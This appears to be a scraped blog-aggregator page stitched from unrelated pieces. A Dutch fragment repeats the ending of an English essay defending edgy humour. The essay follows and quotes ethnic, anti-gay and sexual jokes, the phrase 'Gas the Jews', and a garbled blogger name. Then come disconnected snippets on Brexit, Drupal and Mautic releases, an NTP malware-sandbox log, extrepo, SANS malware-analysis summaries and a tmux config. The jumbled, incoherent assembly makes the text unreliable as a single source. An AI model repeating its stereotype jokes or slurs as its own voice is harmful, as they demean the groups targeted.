De zone omvat net die ideeën waar humor effectief op kan werken. Humor verandert of weerlegt onze wereldbeschouwing met geconcentreerde salvo's van verborgen wijsheid of surrealisme. Maar de knoop moet wel toegankelijk genoeg zijn om te ontwarren. Het bereik van humor wordt beperkt door zijn eigen regels, zoals "Te Vroeg", "Dat is NIET grappig", "Expreslift Naar De Hel Als Ik Lach" of "Ik Snap Het Niet". Dit zijn heel subjectieve grenzen, continu onderhandeld tussen de verteller en het publiek. Als je mij niet gelooft, neem dan de mop over de 51 rietjes, maar vervang "Nederlands" door "Joods".

Als je denkt dat de Joden daarom over jou heersen, dan kijk je niet naar hoe zulke zaken zich effectief uitspelen. Want wat werkelijk over jou heerst is de chronische en ongekalibreerde angst dat je er niet mee aan't lachen bent, die zich in allerlei vormen toont. Dit verklaart waarschijnlijk ook waarom je de mensen moet doen lachen als je ze iets wilt vertellen dat ze niet willen horen, want anders gaan ze je lynchen. Goeie humor is een succesvolle mentale afweer tegen een gedachtengang die te strak en dogmatisch is.

Het verhaal van Mark Meechan is hierbij heel relevant. Dit is de Schot die veroordeeld werd voor "extreem beledigend gedrag" omdat hij zijn hondje aangeleerd had om een hitlergroet te doen als hij "Gas the Jews" zei. Hij heeft altijd gezegd dat hij het puur gedaan had om zijn lief te ambeteren. De "rechtsgang" in dit geval vond dat "context en bedoeling" officieel irrelevant waren voor zulke feiten, wat natuurlijk een atoombom van precedent is. Maar het is nog absurder: in een documentaire van de BBC over deze kwestie, vraagt één van de critici zijn eigen kat ook "Gas The Jews?", die natuurlijk nee zegt "omdat hij goed opgevoed werd". Volgens de uitspraak van het Brits gerecht is die man dus schuldig aan exact hetzelfde misdrijf, en is deze video het enige nodige bewijs.

Ze zagen iemand die grappen maakte die ze beledigend vonden, en dachten dat dit een werkelijke bedreiging vormde voor hun maatschappij. In hun paniek zijn ze dan begonnen met één van de noodzakelijke fundamenten van die maatschappij af te breken. En ze zijn nog steeds bezig.

Het is één grote grap, maar hunne frang is nog niet gevallen.

* * *

Humor is niet zo maar een willekeurige evolutionaire tic, of een zinloze activiteit. Het is een fundamenteel mechanisme dat we zowel individueel als collectief gebruiken om onze rederingen te checken. Humor licht net de grenzen toe van waar we misschien fout bezig zijn, en helpt om fixaties en taboe te doorbreken.

We vinden iets grappig als het ons verrassende en tegenstrijdige signalen geeft, allemaal tegelijkertijd. Als we die snel en juist kunnen uitwerken, en in de grotere wereld kunnen plaatsen, kunnen we iets nieuws en waar leren. Dit wilt ook zeggen dat als de humorpolitie op het toneel verschijnt, dat dit een symptoom is van een collectief gebrek aan begrip, en van onbespreekbare taboes.

Wie pret en spot verbant, verbant uitdagende inzichten, en dat doen we op eigen risico.

Cover Image - Chad and Virgin Laughing
Cover Image - Chad and Virgin Laughing
"A sense of humour is a reflection of a sense of proportion. It occurs when the wiser part of ourselves short-circuits a closed system of thought."

When I was a kid, mocking your international neighbors was the normal thing to do in Europe. More so there were unofficial rivalries, sometimes mutual, sometimes one-way, embodying cultural and historical stereotypes.

The Dutch told jokes like this about us:

A Belgian construction worker is helping out across the border in the Netherlands, and sees a Dutchman pour coffee from his thermos.

"What's that?" he asks.
"It's a thermos! If you put hot things in it, they stay hot. If you put cold things in it, they stay cold."
"That's amazing! How much do you want for it?"
"It's yours for 25 guilders."
"I'll take it!"

The next day he's back in Belgium and proudly shows off his new find during lunch.

"It's a thermos! I got it from the Netherlands! If you put hot things in it, they stay hot. If you put cold things in it, they stay cold."
"Wow, that's amazing! How does it know?"

In turn, we told jokes about them:

A bus with 50 jolly Dutch vacationers is driving down to the Spanish coast, and stops by a gas station in Belgium.

The driver asks the attendant: "Could I get a bucket of water? My engine is having some trouble with this blistering heat!"

"No problem at all!" He goes out back and returns with a big sloshing bucket.

"Also... do you happen to have 51 straws?"

It's not very complicated. Belgians were dumb, and the Dutch were stingy. These are actually much cleaner jokes than the ones we told, because that included:

"How many times does a Dutchman use a condom?"
"Three times. Once the normal way, once inside out, and the third time as chewing gum."

(This was still in primary school, by the way.)

But this joke has a karmic reverse:

"How many times does a Belgian laugh at a joke?"
"Three times. Once when you tell it, once when you explain it, and the third time when he gets it."

Asterix and Obélix - Map of Gaul

Europa Universalis

A casual search will show that the basic jokes about nationality are so scripted, that you can pretty much substitute any country for any other, and arrive at a joke that has been told some place some time. Like this classic train tunnel joke:

A nun, an attractive blonde, a German and a Dutchman are sitting in a train compartment. The train enters a tunnel, it's completely dark, and suddenly there's a slap. When the train comes out of the tunnel, the German is rubbing his face in pain.

The nun's thinking: "The German man probably touched the blonde woman and she slapped him, and rightfully so."

The blonde's thinking: "That German pervert probably tried to grope me, but got the nun instead, and she slapped him. Good."

The German thinks: "The Dutchman obviously copped a feel on that blonde woman, and she hit me instead of him. That bastard!"

The Dutchman thinks: "Next tunnel, I'm gonna slap that German fucker again!"

The nationalities are close neighbors, and that means there's some sort of stereotypical, historical beef. When you change the countries, the joke's meaning can flip, depending on what your preconceptions are.

For example, when the Dutchman is the aggressor, it could be assumed he is seeking some kind of payback for Germany's aggression against the Netherlands. If you tell the version where a German slaps a Dutchman, he might personify unprovoked German aggression. The main reason the joke gets told with nationalities is the same reason it's a nun and an attractive blonde: it adds necessary color to the situation, so the characters (and the audience) can draw all sorts of wrong conclusions instantly.

It is implied that the nationalities are relevant, but never actually stated. It's misdirection to draw you in. The real punchline is that complicated explanations for simple acts of violence are not necessary. A joke about nationalist aggression can instead let you recognize universal themes, through its 4 contradictory perspectives, which bleed into a host of other sensitive topics.

It's important to know the Europe in which such jokes were routinely told was a very different place. The hint is in the "25 guilders" at the start. We didn't always have the Euro, a Customs Union, Schengen-zone visas, and fancy electric trains that connect it all. You only needed to drive a few hours in any direction to arrive at a place where you needed permission to get in, probably didn't speak the language, couldn't tell how much things cost, didn't know the local laws, and couldn't interact with the authorities. Also, these were the same people whose ancestors murdered your ancestors for the last few centuries, but they seemed okay now?

A natural response to having this right on your doorstep was to trivialize and make fun of it. And pretend it was all far away. As if to say: we're all going to be characters in a drama none of us really had any say in, so we may as well have fun with it. Some of these jokes do capture an immense amount of historical and cultural context, for example:

Heaven is where the police are British, the cooks are French, the mechanics German, the lovers Italian and it's all organized by the Swiss.

Hell is where the chefs are British, the mechanics French, the lovers Swiss, the police German and it's all organized by the Italians.

That's a condensed roast of about 150 million people covering at least a century, give or take. Those who crack such jokes don't do so in malice. When the odd Mysterious Stranger actually walked into our town, most of us would be pretty curious and friendly to them. You also wouldn't tell such a joke in front of them, unless you were on good terms (or really bad terms), and had already dropped much of the pretense. The main audience for this was our own tribe, and the goal was to relieve our collective anxiety and fear of the unknown. Letting people in on your jokes about them meant letting them hear something intimate.

In the case of the Belgians and the Dutch, it's right there in the punchlines. Our worry was e.g. that they'd outcompete us with their business acumen. Their worry was e.g. that they'd fail to win against people they considered backwards.

These are universal themes.

Speak Easy

Getting to hear people speak in an unfiltered manner, humorously or not, is an incredibly valuable thing. And I mean for reasons other than quote mining what they said and making them look bad.

One time, I was over at a house of recent friends who didn't yet know I was gay. They were cracking jokes about their gay housemate. The guy apparently used an enormous amount of toilet paper on the regular, which they were attempting to explain by pointing to his assumed sexual activities through the back door. I didn't say anything, certainly didn't want to "come out" then and there. I just laughed along and the moment passed.

There's a certain perspective today that says this was unambiguously homophobic. That such humor is bigoted and degrading to the dignity of the target demographic. That we need to stamp such material with appropriate content warnings, and that those who say it freely should apologize and do penance. That it is not only appropriate but a moral duty to intervene (and conveniently make it all about me in the process).

I for one knew these guys were cracking jokes exactly because they didn't dare bring it up with the person in question. Asking about someone else's toilet issues is not exactly casual small talk. Once you connect humor with taboos, it's really no coincidence that potty humor is a thing.

I also think that if they had known I was gay, they wouldn't have joked around, or been embarrassed after, and then it would have been a Big Thing. The way it went, a concern about a person they shared a house with could be brought up and made legible. I joined the "one of the guys" dynamic, by understanding its rules, context and intent. I can get the same effect now just by saying something funny and insensitive about gay people behind closed doors, to show that it's not a personal landmine at all.

It's also entirely in line with existing LGBT culture. Drag queens in particular have used sass and mockery as a shield, but no mockery is complete without self-mockery. The Adventures of Priscilla: Queen of the Desert (1994) showed everyone how it's done:

The John Cleese quote about a wiser part short circuiting a closed system of thought sounds dead-on to me.

It also reinforces that humor is entirely contextual, because its goal is to dance on the edge of what is actually permissible to say and think. Whatever the current taboos are, whatever's currently the most closed-minded, that's what comedy is most attracted to.

For a great illustration of this, consider two scenes, two years apart. First, the opening to 1999's American Pie:

The lead character is caught jerking off to illegal TV porn by his conservative parents, and the scene is played mostly straight. Situated in its own time as a mainstream American movie, this was pretty raunchy, and reflected common Christian taboos around teenage sex. Particularly when you factor in the titular American Pie which also ends up losing its virginity. A moment so memorable, NYT dedicated a piece to it 20 years later. If anyone was offended by this at the time, it was people who resembled the parents and found it difficult to think or talk about sex without blushing.

These days though, the people who consider this movie offensive would come from the politically opposite side of the spectrum. Reasons cited include the sexism, the gay jokes, and so on. If you believe the press there's loads of detractors now, but really I think they just wanted an excuse to post a video of a young man pretending to fuck apple pie for the clicks.

What's more interesting is how this scene was itself parodied in 2001's Not Another Teen Movie. There's a lot to say about that film, because it's a meticulous fusion of 1980s and 1990s teenage movie tropes. It takes itself not seriously by taking the source material very seriously, with stellar performances. The opening is a direct homage to American Pie, which turns everything about that scene to 11, and exaggerates beyond proportion:

It makes perfect sense when you consider what the common objection was at the time: on-screen teenage sexuality and an acknowledgement of taboo hormonal urges. Instead of a shy nerdy guy with a sock, we have a fearless girl with a comically large pink vibrator. Everyone walks in on it, even grandma and the local pastor. It ends with a whipped cream bukkake, cue the opening titles. The rest of the movie continues this line of subverting source material while throwing in a heavy dose of potty, sex and other gags. It only misses the mark a few times, really, like when it tries to stretch a Token Black Character joke for the entire movie.

If you thought the butt of this was women, or LGBTs, or black people, you'd be missing the point entirely. It was a middle finger aimed at puritan scolds who also spent their time chastizing alien sideboob in video games they had never even played.

Most importantly, audiences thought it was genuinely hilarious.

The Humorton Window

I've mostly stuck to examples that feel dated now, and in the first case, downright provincial.

Jokes about national rivalry have diminished, for the simple reason that the unknown has diminished. After opening European borders, and harmonizing the economic and legal systems, we have a legible continent where countries can easily and freely compare notes. We don't need to joke about who would run things best anymore, we can just go look at the COVID numbers.

When you still encounter this sort of national humor, it's more in the context of April Fools or "shitposting", like the pair of dueling memes:

G E K O L O N I Z E E R D (Colonized)
G E F E D E R A L I Z E E R D (Federalized)

Usually posted by respectively a Dutchman or a Belgian, referring to Dutch imperialism and Belgian bureaucracy respectively, to signify that one demographic seems particularly dominant in a thread or space. It is only properly used when ironic, otherwise it is simply tiresome.jpg.

Sexual humor has also reduced in relevance, because the internet offers unlimited access to both pornography and genuine sex-ed, removing all the basic taboos around it. Rather than a bunch of confused college dudes wondering exactly how gay sex works, you now have guys who tried watching some of it, didn't get aroused by it, and simply moved on.

There are shifting windows of what it is a) acceptable and b) popular to laugh at. There's also a saying, "To learn who rules over you, simply find out who you are not allowed to criticize." This counts doubly so for "or joke about."

This is commonly and falsely attributed to Voltaire but oddly enough appears to originate from a 1993 essay by an actual, genuine, bona fide white nationalist. TIL.

The question of who said it is of course irrelevant, the question is whether it is true or not. A common refutation is that it is disallowed to mock e.g. the mentally disabled, who clearly do not rule over others. But that's a cop out, because doing so lures out those who do have power to punish people for it, namely all sorts of organizations that ostensibly advance the rights of particular groups.

The problem with this system is that it is driven by attention, not by effectiveness. This is described perfectly in the essay The Toxoplasma of Rage, written by recently unmasked blogger Scott Alexander Ocasio-Cortez. When the actions that are rewarded are those that get the most attention, this tends to amplify rather than reduce tensions between different interest groups, by breeding more resentment.

It also tends to confuse the people who already have means and access with those with need of it. As an example of this dynamic, there was a story here a few years ago: an elderly Jewish woman in distress had called a stand-by nurse (iirc). Upon learning that she was Jewish, the nurse scolded her for the collective sins of Israel against Palestine and was rude and unhelpful. I know about this because the next day it was in every major newspaper, after being highlighted by a Jewish interest organization.

The outcome would be very different if e.g. someone was mistreated because they were homeless or a drug addict. It would be pretty much impossible for someone like that to get any serious restitution or acknowledgement here. Whether you call that being in charge or not, it represents two vastly different tiers of access and service, differentiated purely by whom you are not allowed to generalize against.

Another common refutation of not-Voltaire is the success of comedians like Dave Chappelle or Bill Burr, who both brought new material highly critical of cancel culture and organized "alphabet people" (LGBTQIAA2+). They invited prophesied professional and personal doom, but came out more popular than ever. Ricky Gervais' semi-annual Golden Globes speeches are in a similar vein, with the recurring gag that he'll never be invited again, as he roasts some of the wealthiest people to their faces:

Many correctly point out that none of the comedians' careers or lifestyles are in danger. They are multi-millionaires with successful projects under their belts. That is of course why they get to do it. When people who don't have "fuck you money" or big brass balls crack jokes like that, they make themselves a target, and those with means and motive go in for the kill. The saying is of course "find out who rules over you," not over them.


I find this fascinating because it reveals humor as a sort of "Romulan Neutral Zone" on the edge of the usual political Overton Window. This larger zone covers not just what is acceptable, but also what is currently contested. The jokes are the ammo, but the armor is self-confidence derived from skill and success. Comedians play this game on Nightmare difficulty every show night.

This zone consists of ideas which humor is effective at working its magic on. It alters or refutes our worldview with condensed bursts of hidden wisdom or absurdity. But they must be within our grasp to untangle. Humor's range is subject to its own constraints, such as "Too Soon", "That's NOT Funny", "I'm Going To Hell For Laughing" and "I Don't Get It". These are completely subjective limits, which are negotiated and renegotiated between the joke tellers and their audience. If you don't believe me, take the joke about the 51 straws, and replace "Dutch" with "Jewish".

But if you think that means the Jews rule over you, you're refusing to see how these things actually work. What actually rules over you is people's chronic and miscalibrated fear that you might not be kidding, which occurs in highly variable degrees. This might also be a good explanation for the common saying that if you want to tell people something they don't want to hear, you need to make them laugh, or they'll kill you for saying it. Good humor is a successful mental defense against thinking that is too rigid and dogmatic.

The case of Mark Meechan is highly illustrative. This is the Scot who was convicted of "grossly offensive behavior" for teaching his pug-dog to do a Nazi salute, upon hearing "Gas the Jews". He has always claimed he did it purely to annoy his girlfriend. "Justice" in this case includes a court ruling that "context and intent" are officially irrelevant to the matter, an absolute bombshell in legal precedent. But that's not the most absurd part. It's the BBC documentary on the issue afterwards, in which one of the detractors jokingly asks his own cat if it too wants to "Gas the Jews," before concluding no. By the logic of a British court, he is guilty of the same kind of punishable offense, and the video is the only proof necessary.

They looked at a person whose only crime was to make jokes they found offensive, and they thought this made him a credible threat to their entire way of life. In their panicked response, they actually started destroying one of the fundamental foundations of that way of life. They haven't stopped yet.

It's a joke, but the penny has yet to drop.

* * *

Humor seems to be far from just a random evolutionary quirk, or a meaningless pass-time. It is a fundamental mechanism that we individually and collectively use to sanity check ourselves. Humor highlights the boundaries of where we might be wrong, and it helps us cut through hangups and taboo.

It seems to happen when a joke activates surprising and contradictory signals, all at the same time. If we can successfully resolve them using our larger understanding of the world, we can acknowledge something new and true. This also implies that when humor-police shows up, they are a symptom of a collective lack of understanding and of unacknowledged taboos.

When we ban fun and mockery, we ban challenging insights, and we do so at our own peril.

Cover Image - Chad and Virgin Laughing

Do not assume US still aspires to be a world leader.  Differently put: it is time for a EU army.

She also said: the UK will have to “live with the consequences” of Boris Johnson  ditching Theresa May’s plan to maintain close economic ties with the EU after Brexit.

Answering would a no-deal Brexit be a personal defeat for you? No. It would, of course, be in Britain’s and all EU member states’ interests to achieve an orderly departure. But that can only happen if it is what both sides want.

Her Germany is ready for no matter what. She made it so. And she’s telling you.

June 26, 2020

I get eaten by the worms and … For 2 seconds the drums seem to announce this is just a cover but then the beat changes drastically and you’re left wondering what happened while the different vibe grows on you. You (almost) have goosebumps when the bridge happens and you stop breathing to hear it all and then, after that bridge, everything comes together and you’re floating on those familiar minor 9th chord arpeggio’s and those fabulous voices until all fades out and you hit repeat.

YouTube Video
Watch this video on YouTube.

As part of the cron.weekly newsletter, I want to test the plain-text version of the mail as much as possible.

June 25, 2020

Given the impact of COVID-19 on organizations' budgets, we extended Drupal 7's end-of-life date by one year. Drupal 7 will receive security updates until November 2022, instead of November 2021. For more information, see the official announcement.

Extending the lifetime of Drupal 7 felt like the right thing to do. It's aligned with Drupal's goal to build software that is safe for everyone to use.

I wish more software was well-maintained like Drupal is. We released Drupal 7 almost a decade ago and continue to care for it.

We often recognize those who help innovate or introduce new features. But maintaining existing Open Source software also relies on the contributions of individuals and organizations. Today, I'd like us to praise those who maintain and improve Drupal 7. Thank you!

June 17, 2020

If it’s common to say that “Everything is a Freaking DNS problem“, other protocols can also be the source of problems… NTP (“Network Time Protocol”) is also a good candidate! A best practice is to synchronize all your devices via NTP but also to set up the same timezone! We learn by doing mistakes and I wanted to share this one with you.

After spending time to debug, I finally found why many of the automated submissions to my malware analysis Sandbox failed. It’s was due to the timezone and… NTP!

When you prepare a Sandbox system, it must be based on guest images. These images have to reflect your “environment”: Your classic tools must be installed (Microsoft Office, a PDF reader, a browser, etc). To achieve this, I usually start from a standard Windows image that I clone then fine-tune to match my requirements. The problem is that, by default, the Windows operating system synchronizes itself automatically with the Microsoft NTP servers:

How the guest image is used by the Sandbox system? When your environment is ready, you take a snapshot. Later, to analyze a malicious file, the sandbox system will restore the snapshot, copy the file to it and executed it. The snapshot being some “picture” of the system,, the date & time are also frozen and, when you restore it, it continues to run at the time the snapshot was taken. That’s why, the Sandbox must update the time:

2020-06-04 11:48:17,428 [root] INFO: Date set to: 20200615T00:31:18, timeout set to: 300

(Note that it’s a classic feature. Some malware must be analyzed at a specific time or date to ensure that it will execute properly!)

My last snapshot was created on 2020/06/04 11:48:17 and the analyzis started on 2020/06/15 00:31:18:

2020-06-15 00:31:18,734 [root] DEBUG: Starting analyzer from: C:\tmpv556hytw
2020-06-15 00:31:18,734 [root] DEBUG: Storing results at: C:\FMiZIvH
2020-06-15 00:31:18,734 [root] DEBUG: Pipe server name: \\.\PIPE\nRwJWEHQaG
2020-06-15 00:31:18,734 [root] DEBUG: Python path: C:\Users\user01\AppData\Local\Programs\Python\Python38-32
2020-06-15 00:31:18,734 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-15 00:31:18,734 [root] INFO: Automatically selected analysis package "exe"

But suddenly, I saw this in the log:

2020-06-15 00:31:31,359 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00860000.
2020-06-15 02:32:18,074 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-15 02:32:18,074 [lib.api.process] ERROR: Failed to open terminate event for pid 3392
2020-06-15 02:32:18,074 [root] INFO: Terminate event set for process 3392.
2020-06-15 02:32:18,074 [root] INFO: Created shutdown mutex.
2020-06-15 02:32:19,073 [root] INFO: Shutting down package.
2020-06-15 02:32:19,073 [root] INFO: Stopping auxiliary modules.

You can see that suddenly, the system time was 2h ahead (00:31 to 02:32) and the Sandbox triggered a timeout and stopped the analysis. Why?

The Sandbox is running in UTC (tip: it’s always good to use UTC as a standard timezone to avoid issues when correlating events) but my original Windows guest was running in the CET timezone (UTC+2 with the summertime) and NTP synchronization was left configured by default. When the snapshot is restored, the operating system runs as usual and, at regular intervals, synchronized its internal clock via NTP…

Conclusion: do NOT configured NTP in your Sandbox guest images to save you some headaches with broken analysis!

The post When NTP Kills Your Sandbox appeared first on /dev/random.

Just over 7 months ago, I blogged about extrepo, my answer to the "how do you safely install software on Debian without downloading random scripts off the Internet and running them as root" question. I also held a talk during the recent "MiniDebConf Online" that was held, well, online.

The most important part of extrepo is "what can you install through it". If the number of available repositories is too low, there's really no reason to use it. So, I thought, let's look what we have after 7 months...

To cut to the chase, there's a bunch of interesting content there, although not all of it has a "main" policy. Each of these can be enabled by installing extrepo, and then running extrepo enable <reponame>, where <reponame> is the name of the repository.

Note that the list is not exhaustive, but I intend to show that even though we're nowhere near complete, extrepo is already quite useful in its current state:

Free software

  • The debian_official, debian_backports, and debian_experimental repositories contain Debian's official, backports, and experimental repositories, respectively. These shouldn't have to be managed through extrepo, but then again it might be useful for someone, so I decided to just add them anyway. The config here uses the alias for CDN-backed package mirrors.
  • The belgium_eid repository contains the Belgian eID software. Obviously this is added, since I'm upstream for eID, and as such it was a large motivating factor for me to actually write extrepo in the first place.
  • elastic: the elasticsearch software.
  • Some repositories, such as dovecot, winehq and bareos contain upstream versions of their respective software. These two repositories contain software that is available in Debian, too; but their upstreams package their most recent release independently, and some people might prefer to run those instead.
  • The sury, fai, and postgresql repositories, as well as a number of repositories such as openstack_rocky, openstack_train, haproxy-1.5 and haproxy-2.0 (there are more) contain more recent versions of software packaged in Debian already by the same maintainer of that package repository. For the sury repository, that is PHP; for the others, the name should give it away.

    The difference between these repositories and the ones above is that it is the official Debian maintainer for the same software who maintains the repository, which is not the case for the others.

  • The vscodium repository contains the unencumbered version of Microsoft's Visual Studio Code; i.e., the codium version of Visual Studio Code is to code as the chromium browser is to chrome: it is a build of the same softare, but without the non-free bits that make code not entirely Free Software.
  • While Debian ships with at least two browsers (Firefox and Chromium), additional browsers are available through extrepo, too. The iridiumbrowser repository contains a Chromium-based browser that focuses on privacy.
  • Speaking of privacy, perhaps you might want to try out the torproject repository.
  • For those who want to do Cloud Computing on Debian in ways that isn't covered by Openstack, there is a kubernetes repository that contains the Kubernetes stack, the as well as the google_cloud one containing the Google Cloud SDK.

Non-free software

While these are available to be installed through extrepo, please note that non-free and contrib repositories are disabled by default. In order to enable these repositories, you must first enable them; this can be accomplished through /etc/extrepo/config.yaml.

  • In case you don't care about freedom and want the official build of Visual Studio Code, the vscode repository contains it.
  • While we're on the subject of Microsoft, there's also Microsoft Teams available in the msteams repository. And, hey, skype.
  • For those who are not satisfied with the free browsers in Debian or any of the free repositories, there's opera and google_chrome.
  • The docker-ce repository contains the official build of Docker CE. While this is the free "community edition" that should have free licenses, I could not find a licensing statement anywhere, and therefore I'm not 100% sure whether this repository is actually free software. For that reason, it is currently marked as a non-free one. Merge Requests for rectifying that from someone with more information on the actual licensing situation of Docker CE would be welcome...
  • For gamers, there's Valve's steam repository.

Again, the above lists are not meant to be exhaustive.

Special thanks go out to Russ Allbery, Kim Alvefur, Vincent Bernat, Nick Black, Arnaud Ferraris, Thorsten Glaser, Thomas Goirand, Juri Grabowski, Paolo Greppi, and Josh Triplett, for helping me build the current list of repositories.

Is your favourite repository not listed? Create a configuration based on template.yaml, and file a merge request!

June 16, 2020

I published the following diary on “Sextortion to The Next Level“:

For a long time, our mailboxes are flooded with emails from “hackers” (note the quotes) who pretend to have infected our computers with malware. The scenario is always the same: They successfully collected sensitive pieces of evidence about us (usually, men visiting adult websites) and request some money to be paid in Bitcoins or they will disclose everything. We already reported this kind of malicious activity for the first time in 2018. Attacks evolved with time and they improved their communication by adding sensitive information like a real password (grabbed from major data leaks) or mobile phones… [Read more]

The post [SANS ISC] Sextortion to The Next Level appeared first on /dev/random.

Mautic released

A year ago, Acquia acquired Mautic. Mautic is an Open Source marketing automation and campaign management platform.

Some of you have been wondering: What has been going on since the acquisition?. It's high time for an update!

Mautic 3 released

Mautic 3 was released last night. It is the first major release in four years, and a big milestone!

I'd like to extend a big thank you to everyone who contributed to Mautic 3. I'm also proud to say that Acquia was the largest contributor.

For me personally, it was nice to see some long-term Drupal developers contribute to Mautic 3. When Acquia acquired Mautic, I hoped to see cross-pollination between Drupal and Mautic.

A streamlined release model for Mautic 4

The Mautic 3 release was mostly an "under the hood" release. The focus was on upgrading and modernizing Mautic's underlying frameworks (e.g. Symfony and other dependencies).

We want Mautic 4 to offer some much-requested new features. In order to do so, Mautic is switching to a new innovation and release model. Instead of having to wait almost four years for a major release with new features, there will be four Mautic releases with new features each year.

The Drupal community went through a similar transformation five years ago. The Drupal community now brings more value to its users in less time. Because of the faster innovation cycle, Drupal also has more active contributors than ever before.

A quarterly release cycle creates a healthy heartbeat for an Open Source project. You can expect Mautic to deliver improvements more frequently and predictably moving forward.

A streamlined governance model

As a young Open Source project, Mautic was lacking clearly defined roles and responsibilities. For example, it was unclear to many (including me) how the Open Source project and Mautic, Inc., the for-profit company, best collaborated.

With the acquisition by Acquia, the need for clear roles and responsibilities became even more called for.

One of the first things Acquia did post-acquisition was to develop a new governance model in collaboration with the Mautic community.

Mautic's new governance model defines different teams and working groups, how the community and Acquia collaborate, and more. With roles and responsibilities more clearly defined, we can go faster together.

A new project lead

I'm also excited to share that Ruth Cheesley is Mautic's new Project Lead.

Ruth has been involved with Mautic for a long time, and prior to Mautic, was on Joomla!'s Community Leadership Team. She is also a member of Drupal's Community Working Group. Ruth works at Acquia. As she is part of my team, I've been working closely with Ruth for the past 6+ months and could not be more excited about her involvement and new role.

Ruth has the full support of Acquia, Mautic's community leadership team, and DB Hurley, Mautic's founder and previous Project Lead. A big thank you to DB for his leadership and having guided Mautic thus far — getting an Open Source project off the ground and to this stage is no small feat.


With a new governance model, leadership structure, as well as a new release and innovation model for Mautic, we're set up well to accelerate and innovate for the long run.

June 13, 2020

bulky T510 and tiny n135When my Thinkpad x250 broke down last week with what appears to be a motherboard failure, I tried to convince my daughter to hand over her T410 but work-from-home-schooling does not work without a computer, so she refused. Disillusioned in my diminishing parenting powers, I dug up my 10 year old Samsung n135 netbook instead. It still had Ubuntu 14.10 running and the battery was pining for the fjords, but after buying a new battery (€29), updating Ubuntu to 18.04 LTS and switching to Lubuntu it really is usable again.

Now to be honest, I did get replacement laptop (a bulky T510 with only 4GB of RAM) with my own SSD inside from my supplier, so I’m not using that old netbook full-time, but happy to have it running smoothly nonetheless.

The future, to end this old-fashioned geekery off with, will very likely be a Dell XPS-13 9300 (yep, I’ll be cheating on Lenovo) on which I’ll happily install Ubuntu 20.04 LTS on. I’ve upgraded my wife’s x240 to that already and I must say it runs smoothly and looks great when compared to 18.04 which I’m still running.

June 12, 2020

I published the following diary on “Malicious Excel Delivering Fileless Payload“:

Macros in Office documents are so common today that my honeypots and hunting scripts catch a lot of them daily. I try to keep an eye on them because sometimes you can spot an interesting one (read: “using a less common technique”).  Yesterday, I found such a sample that deserve a quick diary… [Read more]

The post [SANS ISC] Malicious Excel Delivering Fileless Payload appeared first on /dev/random.

June 11, 2020

I published the following diary on “Anti-Debugging JavaScript Techniques“:

For developers who write malicious programs, it’s important to make their code not easy to be read and executed in a sandbox. Like most languages, there are many ways to make the life of malware analysts mode difficult (or more exciting, depending on the side of the table you’re sitting ;-).

Besides being an extremely permissive language with its syntax and making it easy to obfuscate, JavaScript can also implement anti-debugging techniques. A well-known technique is based on the method arguments.callee(). This method allows a function to refer to its own body… [Read more]

The post [SANS ISC] Anti-Debugging JavaScript Techniques appeared first on /dev/random.

If you’re a bit like me, you’re probably impatient. You want things to move quickly. There’s no time to waste!

June 09, 2020

After more than 2 years of building Oh Dear, I still struggle with the most fundamental question: how are users finding our application and where should we focus our marketing efforts to maximize that?

June 07, 2020

tmux upgrade from 2.8 to 3.0...

# invisible separators
set-option -g pane-border-fg black
set-option -g pane-border-bg black
set-option -g pane-active-border-fg black
set-option -g pane-active-border-bg black


set -g pane-border-style bg=black,fg=black
set -g pane-active-border-style bg=black,fg=black

as mentioned in the changelog.

June 04, 2020

I published the following diary on “Anti-Debugging Technique based on Memory Protection“:

Many modern malware samples implement defensive techniques. First of all, we have to distinguish sandbox-evasion and anti-debugging techniques. Today, sandboxes are an easy and quick way to categorize samples based on their behavior. Malware developers have plenty of tests to perform to detect the environment running their code. There are plenty of them, some examples: testing the disk size, the desktop icons, the uptime, processes, network interfaces MAC addresses, hostnames, etc… [Read more]

The post [SANS ISC] Anti-Debugging Technique based on Memory Protection appeared first on /dev/random.

This post shares some ideas about working with cronjobs, to help make common tasks more easy for both junior and senior sysadmins.

June 03, 2020

Today, we released Drupal 9.0.0! This is a big milestone because we have been working on Drupal 9 for almost five years.

I updated my site to run Drupal 9 earlier today. It was easy!

As I write this, I'm overwhelmed by feelings of excitement and pride. There is something very special about building and releasing software with thousands of people around the world.

However, I find myself conflicted between today's successful launch and the tragic events in the United States. I can't go about business as usual. Discrimination is the greatest threat to any community, Drupal included.

I have always believed that Drupal is a force for good in the world. People point to our community as one of the largest, most diverse and most supportive Open Source projects in the world. While we make mistakes and can always be better, it's important that we lead by example. That starts with me. I am committing to the community that I will continue to learn more, and fight for equality and justice. I can and will do more. Above all else, it's important to stand in solidarity with Black members of the Drupal community — and the Black community at large.

During this somber time, I remain incredibly proud of our community for delivering Drupal 9. We did this together, as a global community made up of people from different races, ethnicities, genders, and national origins. It gives me some needed positivity.

If you haven't looked at Drupal in a while, I recommend you look again. Compared to Drupal 8.0.0, Drupal 9 is more usable, accessible, inclusive, flexible, and scalable than previous versions. We made so much progress on such important things:

  • Drupal 9 is dramatically easier to use for marketers
  • Drupal 9 is easier to maintain and upgrade for developers
  • Drupal is innovating with its headless or decoupled capabilities

It's hard to describe the amount of innovation and care that went into Drupal since the first release of Drupal 8 almost five years ago. To try and grasp the scale, consider this: more than 4,500 individuals contributed to Drupal core during the past 4.5 years. During that time, the number of active contributors increased by almost 50%. Together, we created the most author-friendly and powerful version of Drupal to date.

Thank you to everyone who made Drupal 9 happen.

June 02, 2020

... isn't ready yet, but it's getting there.

I had planned to release a new version of SReview, my online video review and transcoding system that I wrote originally for FOSDEM but is being used for DebConf, too, after it was set up and running properly for FOSDEM 2020. However, things got a bit busy (both in my personal life and in the world at large), so it fell a bit by the wayside.

I've now also been working on things a bit more, in preparation for an improved administrator's interface, and have started implementing a REST API to deal with talks etc through HTTP calls. This seems to be coming along nicely, thanks to OpenAPI and the Mojolicious plugin for parsing that. I can now design the API nicely, and autogenerate client side libraries to call them.

While at it, because libmojolicious-plugin-openapi-perl isn't available in Debian 10 "buster", I moved the docker containers over from stable to testing. This revealed that both bs1770gain and inkscape changed their command line incompatibly, resulting in me having to work around those incompatibilities. The good news is that I managed to do so in a way that keeps running SReview on Debian 10 viable, provided one installs Mojolicious::Plugin::OpenAPI from CPAN rather than from a Debian package. Or installs a backport of that package, of course. Or, heck, uses the Docker containers in a kubernetes environment or some such -- I'd love to see someone use that in production.

